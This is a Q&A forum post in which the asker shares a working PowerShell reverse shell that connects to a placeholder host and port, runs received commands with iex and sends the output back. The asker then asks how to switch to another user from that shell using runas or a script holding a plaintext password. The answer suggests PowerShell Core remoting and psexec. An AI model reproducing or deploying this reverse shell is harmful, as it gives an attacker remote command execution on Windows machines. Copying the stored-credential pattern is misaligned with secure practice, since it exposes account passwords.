# How can i use powershel to login as another user or run a script as another user when the shell is not fully interactive?

Tags: windows, powershell, cmd

I have a remote windows machine sending me a shell to a linux machine using the following command:

```
$client = New-Object System.Net.Sockets.TCPClient("__HOST__",__PORT__);
$stream = $client.GetStream();
[byte[]]$bytes = 0..255|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
}
$client.Close();
```

From my linux command line i can enter commands using powershell on the remote windows machine. My goal is to change the shell to another user or run a script as another user.
I have attempted to use the following command to login as a new user:

```
runas /user:domaint\admin cmd.exe
```

however , Unfortunately the shell is not fully interactive and when it prompts for a password it quickly closes the prompt and awaits a new command.
is their anyway to force powershell to wait my response? or a way to get a fully interactive shell?

In a further attempt i have written the following script to execute my script as the other user however the 'test.ps1' does not execute:

```
$username = 'domain\user'
$password = 'pa$$word'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process test.ps1 -Credential $credential
```

I am aware this method is insecure however as i dont have the option to enter credentials i may need to store them in a script. ( this is for fun and challenge purposes).
Any advice on how i can fix my script to execute another script, or gain a fully interactive powershell terminal?

Thanks

Answer (score 0):

you cannot create a fully interactive remote session using PowerShell and User interactive sessions are not best way to automate as well. You can use PowerShell core which is supported in linux. Then you can do remoting and `Invoke-Command` as different user. Read more about PowerShell core [here](https://github.com/PowerShell/PowerShell) and on linux [here](https://www.starwindsoftware.com/blog/using-powershell-on-linux).

If you really need interactive session, then I recommend using `psexec.exe` with `-i` option which creates an interactive session.

```
psexec \\server -i powershell -file c:\test.ps1
```